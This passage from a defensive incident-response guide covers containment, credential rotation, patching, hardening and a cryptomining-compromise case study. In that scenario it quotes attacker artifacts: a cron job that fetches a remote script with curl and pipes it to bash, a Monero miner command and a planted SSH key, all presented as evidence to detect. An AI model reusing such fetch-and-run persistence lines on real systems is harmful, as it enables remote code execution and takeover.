# Kill a specific process (use PID from ps aux)
kill -9 <PID>

# Kill all processes by a suspicious user
pkill -u suspicioususer

7.3 Rotate All Credentials

This must be done after isolation, not before — rotating credentials while the attacker is connected may alert them and cause destructive action.

# Rotate SSH keys for all users — remove unauthorized keys first
# Edit ~/.ssh/authorized_keys and remove unknown entries
# Then generate new keys for your team
ssh-keygen -t ed25519 -C "new_key_post_incident_$(date +%F)"

# Rotate system user passwords
passwd root
passwd <other_users>

# AWS — rotate IAM access keys
aws iam create-access-key --user-name YOUR_USER
aws iam delete-access-key --user-name YOUR_USER --access-key-id OLD_KEY_ID

# Rotate database passwords
# PostgreSQL example:
psql -U postgres -c "ALTER USER appuser WITH PASSWORD 'new_strong_password';"

# Rotate API keys, webhook secrets, and JWT secrets in your application
# Update environment variables / secrets manager entries

7.4 Patch the Exploited Vulnerability

# Update all packages (Ubuntu/Debian)
apt update && apt upgrade -y

# Update all packages (RHEL/CentOS/Amazon Linux)
yum update -y  # or: dnf update -y

# If a specific CVE was exploited, patch that component first
# Example: if OpenSSH was vulnerable
apt install --only-upgrade openssh-server

# Check current versions
nginx -v
openssl version
python3 --version
node --version

7.5 Restore from Backups

If system files, application code, or databases were modified:

# Identify what changed using your baseline or last known-good snapshot
# Compare current file hashes against baseline (the baseline must have been built with the same hash tool)
sha256sum /usr/bin/ls /bin/bash /sbin/sshd > current_hashes.txt
diff baseline_hashes.txt current_hashes.txt

# Restore specific files from backup
rsync -avz backup_server:/backups/latest/etc/ /etc/

# Or restore the entire server from a pre-incident snapshot
# (AWS: restore from AMI or EBS snapshot taken before incident)
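
The baseline comparison above only works if a baseline was recorded while the system was known to be clean. A minimal sketch of both halves follows, assuming GNU coreutils sha256sum; the function names record_baseline and changed_files are made up for this example.

```shell
# Sketch: record hashes of chosen files on a known-good system.
# usage: record_baseline OUTFILE FILE...
record_baseline() {
  local out="$1"; shift
  sha256sum "$@" > "$out"
}

# Sketch: print the files whose current hash no longer matches the baseline
# (missing or unreadable files are reported as well).
# usage: changed_files BASELINE
changed_files() {
  LC_ALL=C sha256sum --check --quiet "$1" 2>/dev/null | sed -n 's/: FAILED.*$//p'
}
```

For example, run `record_baseline /root/baseline_hashes.txt /usr/bin/ls /bin/bash /usr/sbin/sshd` after provisioning, keep a copy off the server, and run `changed_files /root/baseline_hashes.txt` during an investigation. On a host you believe is compromised, run the check with trusted binaries (for instance from rescue media), since the hashing tool itself may have been replaced.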

7.6 Notify Stakeholders

Incident communication is as important as technical response.

Internal notifications:

  • CTO / Engineering Lead — immediately upon confirmed compromise
  • Legal and Compliance — if any user data may have been accessed (GDPR, NDPR, etc.)
  • On-call team — to mobilise support

External notifications (if applicable):

  • Affected customers — if PII, payment data, or health data was exposed
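  • Data protection authorities (GDPR requires notification within 72 hours of becoming aware of a personal data breach, unless the breach is unlikely to put individuals at risk)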
  • Cyber insurance provider — if you have a policy
  • Law enforcement — for significant breaches or nation-state activity

8. Prevention Best Practices

Detection and response matter, but preventing a compromise is almost always cheaper than responding to one.

8.1 Multi-Factor Authentication (MFA)

Enable MFA on every access point:

# Install Google Authenticator PAM module for SSH MFA
apt install libpam-google-authenticator

# Configure PAM for SSH
echo "auth required pam_google_authenticator.so" >> /etc/pam.d/sshd

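# Enforce in sshd. sshd keeps the first value it reads for each keyword, so lines appended to
# sshd_config can be silently ignored. A drop-in is read first where the main file begins with
# "Include /etc/ssh/sshd_config.d/*.conf" (check this on your distro; 10-mfa.conf is an example name)
cat > /etc/ssh/sshd_config.d/10-mfa.conf << 'EOF'
ChallengeResponseAuthentication yes
AuthenticationMethods publickey,keyboard-interactive
EOF
sshd -t && systemctl restart sshd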

8.2 Enforce Least Privilege

# Audit sudo access — nobody should have NOPASSWD unless absolutely necessary
grep -r "NOPASSWD" /etc/sudoers /etc/sudoers.d/

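# Lock down SSH — disable root login and password authentication
# (sshd uses the first value it reads for each keyword, so edit or remove any
#  earlier occurrence of these directives; appended lines do not override them)
cat >> /etc/ssh/sshd_config << 'EOF'
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
# Allow only the users who need SSH access (keep comments on their own line)
AllowUsers deploy ubuntu YOUR_USER
EOF
sshd -t && systemctl restart sshd   # validate the config before restarting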
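
Because the same directive can appear in several places, it helps to check what sshd actually ends up with rather than what was written to the file. `sshd -T` prints the effective configuration with lowercase keywords. The sketch below checks that output against the hardened values from this section; `audit_sshd` is a hypothetical helper name, and the list of expected values is an assumption you should adapt:

```shell
# audit_sshd: reads `sshd -T` output on stdin and prints one line per
# setting that differs from the expected hardened value.
# Returns non-zero if anything is wrong or missing.
audit_sshd() {
  awk '
    BEGIN {
      bad = 0
      want["permitrootlogin"] = "no"
      want["passwordauthentication"] = "no"
      want["pubkeyauthentication"] = "yes"
    }
    ($1 in want) {
      seen[$1] = 1
      if ($2 != want[$1]) {
        printf "MISMATCH %s: got %s, want %s\n", $1, $2, want[$1]
        bad = 1
      }
    }
    END {
      for (k in want) {
        if (!(k in seen)) { printf "MISSING %s\n", k; bad = 1 }
      }
      exit bad
    }
  '
}

# Usage (as root): sshd -T | audit_sshd
```

Running this after every change to `sshd_config` catches the case where an earlier line silently wins over the one you appended.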

8.3 Patch Management

Unpatched software is one of the most common causes of compromise. Automate updates:

# Ubuntu — enable automatic security updates
apt install unattended-upgrades
dpkg-reconfigure --priority=low unattended-upgrades

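# Set to auto-apply security patches only
# (the heredoc delimiter is quoted so the shell does not expand ${distro_id} and ${distro_codename})
cat > /etc/apt/apt.conf.d/50unattended-upgrades << 'EOF'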
Unattended-Upgrade::Allowed-Origins {
    "${distro_id}:${distro_codename}-security";
};
Unattended-Upgrade::Automatic-Reboot "false";
EOF
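
To confirm that automatic patching is keeping up, you can list the packages that still have a pending update from a security pocket. This sketch parses the output of `apt list --upgradable`; the helper name `pending_security_updates` is hypothetical, and the line format it expects (`name/pocket,pocket version arch [...]`) is an assumption based on current Ubuntu releases:

```shell
# pending_security_updates: reads `apt list --upgradable` output on stdin
# and prints the name of every package whose update comes from a
# "-security" pocket.
pending_security_updates() {
  awk '{
    # First field looks like "openssl/jammy-updates,jammy-security"
    split($1, part, "/")
    if (part[2] ~ /-security/) print part[1]
  }'
}

# Usage: apt list --upgradable 2>/dev/null | pending_security_updates
```

An empty result means no security updates are waiting. A list that keeps growing suggests unattended-upgrades is not running as intended.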

8.4 Log Monitoring and Alerting

┌─────────────────────────────────────────────────────────────────┐
│                   LOGGING ARCHITECTURE                          │
│                                                                 │
│  Server Logs  ──►  Log Aggregator  ──►  SIEM / Alerting        │
│  (auth.log,        (Fluentd,             (Elastic/Kibana,       │
│   syslog,           Filebeat,             Splunk, Datadog,      │
│   nginx.log)        Logstash)             Wazuh)                │
│                                                ↓                │
│                                        Alert Rules              │
│                                        - Root login             │
│                                        - New user created       │
│                                        - Port scan detected     │
│                                        - Auth failure spike     │
└─────────────────────────────────────────────────────────────────┘

Configure alerts for at minimum:

  • Root logins
  • New user creation or privilege escalation
  • SSH login failures exceeding threshold (e.g., >10 in 60 seconds)
  • Successful logins from new/unknown IP addresses
  • Security service failures (auditd stopped, fail2ban stopped)
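
Before a SIEM is in place, the failure-threshold rule above can be approximated directly on the log file. The sketch below is a rough stand-in, not a replacement for real alerting: `failed_login_spikes` is a hypothetical helper, it assumes the traditional syslog timestamp format (`Jan 15 03:08:22 ...`), and it counts per calendar minute rather than over a sliding 60-second window:

```shell
# failed_login_spikes [THRESHOLD] < auth.log
# Prints "<count> <ip> <month> <day> <HH:MM>" for every source IP with more
# than THRESHOLD failed SSH password attempts in one calendar minute.
failed_login_spikes() {
  local threshold="${1:-10}"
  awk -v t="$threshold" '
    /sshd/ && /Failed password/ {
      ip = ""
      # The source address is the word that follows "from"
      for (i = 1; i < NF; i++) if ($i == "from") ip = $(i + 1)
      if (ip == "") next
      # Bucket by IP + month + day + HH:MM
      key = ip " " $1 " " $2 " " substr($3, 1, 5)
      count[key]++
    }
    END { for (k in count) if (count[k] > t) print count[k], k }
  '
}

# Usage: failed_login_spikes 10 < /var/log/auth.log
```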

8.5 Intrusion Detection (IDS/IPS)

# Install and configure Wazuh agent (open-source HIDS/SIEM)
# Wazuh monitors files, logs, processes, and vulnerabilities in real time
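# (apt-key is deprecated; store the key in a dedicated keyring and reference it with signed-by)
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH \
  | gpg --dearmor -o /usr/share/keyrings/wazuh.gpg
echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/4.x/apt/ stable main" \
  | tee /etc/apt/sources.list.d/wazuh.list
apt update && apt install wazuh-agent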

# Configure Wazuh manager connection
sed -i "s|MANAGER_IP|YOUR_WAZUH_MANAGER_IP|g" /var/ossec/etc/ossec.conf
systemctl enable wazuh-agent && systemctl start wazuh-agent

8.6 File Integrity Monitoring (FIM)

# AIDE — Advanced Intrusion Detection Environment
apt install aide

# Initialize the AIDE database (baseline snapshot)
aideinit
cp /var/lib/aide/aide.db.new /var/lib/aide/aide.db

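# Run a check (compare current state to baseline)
# On Debian/Ubuntu the config lives in /etc/aide/aide.conf and must be passed explicitly
aide --config /etc/aide/aide.conf --check

# Automate daily checks
echo "0 2 * * * root /usr/bin/aide --config /etc/aide/aide.conf --check | mail -s 'AIDE Report' security@yourcompany.com" \
  >> /etc/crontab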

8.7 Backup Strategy

┌─────────────────────────────────────────────────────┐
│              THE 3-2-1 BACKUP RULE                  │
│                                                     │
│  3  copies of your data                             │
│  2  different storage media/services                │
│  1  copy offsite / air-gapped                       │
│                                                     │
│  For cloud servers:                                 │
│  ─ Daily automated EBS snapshots                    │
│  ─ Weekly cross-region backup copy                  │
│  ─ Monthly export to immutable cold storage         │
│  ─ Test restores quarterly                          │
└─────────────────────────────────────────────────────┘
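
A backup schedule is only useful if it is actually running. As a small complement to restore testing, the sketch below checks that a backup directory contains at least one recently written file. `backup_is_fresh` is a hypothetical helper, it assumes GNU `find`, and it verifies freshness only; it says nothing about whether the backup can be restored:

```shell
# backup_is_fresh DIR MAX_AGE_HOURS
# Succeeds if DIR contains at least one regular file modified within the
# last MAX_AGE_HOURS hours; fails otherwise.
backup_is_fresh() {
  local dir="$1" max_hours="$2"
  [ -n "$(find "$dir" -type f -mmin "-$((max_hours * 60))" -print -quit)" ]
}

# Usage: backup_is_fresh /backups/latest 24 || echo "No backup in the last 24h"
```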

8.8 Harden Your Attack Surface

# Disable unused services
systemctl list-units --type=service --state=running
systemctl disable --now bluetooth avahi-daemon cups  # Examples of unneeded services

# Close unused ports with UFW
ufw default deny incoming
ufw default allow outgoing
ufw allow 22/tcp    # SSH
ufw allow 443/tcp   # HTTPS
ufw allow 80/tcp    # HTTP
ufw enable

# Disable IPv6 if not needed
echo "net.ipv6.conf.all.disable_ipv6 = 1" >> /etc/sysctl.conf
sysctl -p

# Restrict access to the metadata service (AWS IMDS v2 only)
aws ec2 modify-instance-metadata-options \
  --instance-id i-YOUR_INSTANCE_ID \
  --http-tokens required \
  --http-endpoint enabled
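
After tightening the firewall, it is worth confirming that nothing is listening on a port you did not intend to expose. The sketch below compares the output of `ss -H -tln` against an allowlist; `unexpected_ports` is a hypothetical helper, and the allowlist in the usage line simply mirrors the UFW rules above:

```shell
# unexpected_ports ALLOWED_PORT... < output of `ss -H -tln`
# Prints every listening TCP port that is not in the allowlist.
unexpected_ports() {
  local allowed=" $* "
  # Column 4 is "address:port"; the port is whatever follows the last colon
  awk '{ n = split($4, a, ":"); print a[n] }' | sort -un | while read -r port; do
    case "$allowed" in
      *" $port "*) ;;          # expected port, ignore
      *) echo "$port" ;;       # not in the allowlist
    esac
  done
}

# Usage: ss -H -tln | unexpected_ports 22 80 443
```

Any port this prints is either a service to disable or a rule missing from your documented baseline.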

9. Real-World Example: Detecting a Compromised Linux Server

The Scenario

A startup's Node.js API server on AWS EC2 (Ubuntu 22.04) starts showing unusual behaviour. The on-call engineer notices the server's CPU is at 95% with no corresponding increase in API traffic. The following investigation unfolds.


T+0:00 — Initial Alert

The monitoring system (Datadog) fires a CPU alert. The engineer SSHes in:

$ top
# Output shows a process named "kworkerds" consuming 92% CPU
# This is NOT a real kernel worker — it's disguised malware

T+0:05 — Process Investigation

$ ps aux | grep kworkerds
nobody  14782  92.1  0.2  /tmp/.cache/kworkerds -o pool.monero.hashvault.pro:443 -u <wallet>

# Immediately suspicious: running from /tmp, connecting to a Monero mining pool
$ ls -lah /tmp/.cache/
total 2.9M
drwxr-xr-x 2 nobody nogroup  4096 Jan 15 03:12 .
-rwxr-xr-x 1 nobody nogroup 2.9M Jan 15 03:11 kworkerds

T+0:08 — Network Investigation

$ ss -tnp | grep 14782
ESTAB  0  0  10.0.1.45:52441  195.201.x.x:443  users:(("kworkerds",pid=14782))
# Outbound connection to a known mining pool IP

T+0:10 — Finding the Entry Point

$ grep "Jan 15 03:" /var/log/auth.log
Jan 15 03:08:22 sshd: Failed password for root from 91.108.x.x port 44213
# ... 847 more failed lines ...
Jan 15 03:11:47 sshd: Accepted password for nobody from 91.108.x.x port 52109

Root cause identified: the nobody user had a weak password and SSH password authentication was enabled. The attacker brute-forced it in under 4 minutes.
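
The pattern in this log (a burst of failures followed by one success from the same address) can be searched for mechanically. The sketch below is one way to do it, assuming standard OpenSSH log lines that contain `Failed password ... from <ip>` and `Accepted ... for <user> from <ip>`; `bruteforce_successes` is a hypothetical helper name:

```shell
# bruteforce_successes [MIN_FAILURES] < auth.log
# Prints "<ip> failures=<n> user=<user>" for every accepted login whose
# source IP had at least MIN_FAILURES failed password attempts earlier
# in the same log.
bruteforce_successes() {
  local min="${1:-5}"
  awk -v min="$min" '
    # Return the word that follows `word` on the current line
    function after(word,   i) {
      for (i = 1; i < NF; i++) if ($i == word) return $(i + 1)
      return ""
    }
    /sshd/ && /Failed password/ { failed[after("from")]++ }
    /sshd/ && /Accepted/ {
      ip = after("from")
      if (failed[ip] >= min)
        printf "%s failures=%d user=%s\n", ip, failed[ip], after("for")
    }
  '
}

# Usage: bruteforce_successes 5 < /var/log/auth.log
```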

T+0:15 — Finding Persistence

$ crontab -l -u nobody
* * * * * curl -s http://91.108.x.x/update.sh | bash

$ cat ~nobody/.ssh/authorized_keys  # ~nobody expands to nobody's home, not the engineer's
ssh-rsa AAAAB3NzaC1... attacker@kali
# Attacker's SSH key planted for persistent re-entry
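
An attacker who plants one key may plant several, so the same check is worth running for every account. The sketch below walks a passwd-format file and prints each key it finds, prefixed with the owning user. `list_authorized_keys` is a hypothetical helper, and it only looks at the default `~/.ssh/authorized_keys` location, so a custom `AuthorizedKeysFile` setting would need separate handling:

```shell
# list_authorized_keys [PASSWD_FILE]
# For every account in PASSWD_FILE (default: /etc/passwd), prints
# "<user>: <key line>" for each non-comment line in that account's
# ~/.ssh/authorized_keys. Run as root to read other users' files.
list_authorized_keys() {
  local passwd="${1:-/etc/passwd}" user home file
  # passwd fields: name:password:uid:gid:gecos:home:shell
  while IFS=: read -r user _ _ _ _ home _; do
    file="$home/.ssh/authorized_keys"
    [ -r "$file" ] || continue
    awk -v u="$user" '!/^#/ && NF { print u ": " $0 }' "$file"
  done < "$passwd"
}

# Usage (as root): list_authorized_keys
```

Any key whose comment or fingerprint you cannot attribute to a known person or system should be treated as attacker persistence until proven otherwise.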

T+0:20 — Response

  1. AWS security group updated to deny all inbound/outbound except the engineer's IP
  2. EBS snapshot taken
  3. Malicious process killed: kill -9 14782
  4. Attacker SSH key removed from authorized_keys
  5. Malicious cron job removed
  6. Binary deleted: rm -rf /tmp/.cache/
  7. nobody user password reset, SSH password auth disabled
  8. fail2ban installed and configured
  9. Postmortem scheduled

Lessons Applied:

  • SSH password authentication was disabled on all servers
  • fail2ban was rolled out across the entire fleet
  • The nobody user was locked from SSH: usermod -s /sbin/nologin nobody
  • A baseline of authorised processes was added to the SIEM for anomaly detection
  • AWS GuardDuty was enabled on the account — its cryptocurrency-related findings would likely have flagged the mining-pool connection far sooner than the CPU alert did

10. Conclusion — The DICRP Framework

Every server incident, regardless of severity, fits into a five-phase lifecycle. Having a mental model for this prevents you from jumping straight to remediation before you have fully understood the scope.

┌───────────────────────────────────────────────────────────────────────────┐
│                         THE DICRP FRAMEWORK                               │
│                                                                           │
│  ┌─────────┐   ┌───────────┐   ┌─────────┐   ┌─────────┐   ┌─────────┐  │
│  │  DETECT │──►│INVESTIGATE│──►│ CONTAIN │──►│ RECOVER │──►│ PREVENT │  │
│  └─────────┘   └───────────┘   └─────────┘   └─────────┘   └─────────┘  │
│                                                                           │
│  Detect        Investigate     Contain         Recover        Prevent     │
│  ─────────     ───────────     ───────         ───────        ───────     │
│  Monitoring    Preserve        Isolate         Restore        Harden      │
│  Alerts        evidence        server          from backup    SSH         │
│  Log review    ID access       Kill sessions   Patch vuln     Enable MFA  │
│  Anomalies     vector          Rotate creds    Verify         FIM         │
│                Timeline        Scope blast     integrity      IDS/SIEM    │
│                Persistence     radius          Resume ops     Least priv  │
└───────────────────────────────────────────────────────────────────────────┘

A server compromise is not just a technical event — it is a business event with legal, reputational, and financial consequences. The teams that handle it best are not the ones who never get attacked; they are the ones who have already thought through their response before the incident happens.

Build your detection. Practice your playbook. Know your logs. The attacker only needs to get lucky once — you need to be ready every time.


Quick Reference Card

FIRST 10 MINUTES CHECKLIST
────────────────────────────────────────────────────────────────────
☐ Take a cloud disk snapshot BEFORE doing anything else
☐ Run: ps aux --sort=-%cpu | head -20
☐ Run: ss -tulpn
☐ Run: last -n 50 -a
☐ Run: grep "Accepted" /var/log/auth.log | tail -30
☐ Run: find / -mtime -1 -type f -not -path "/proc/*" 2>/dev/null | head -20
☐ Check: crontab -l; ls /etc/cron.d/ (repeat crontab -l -u USER for each user)
☐ Check: cat ~/.ssh/authorized_keys (for all users)
☐ Isolate server (update security group / iptables)
☐ Notify your incident response team
────────────────────────────────────────────────────────────────────

This article reflects current best practices as of mid-2024. The threat landscape evolves continuously — always verify CVEs, tooling, and log paths against your specific OS version and cloud provider documentation.
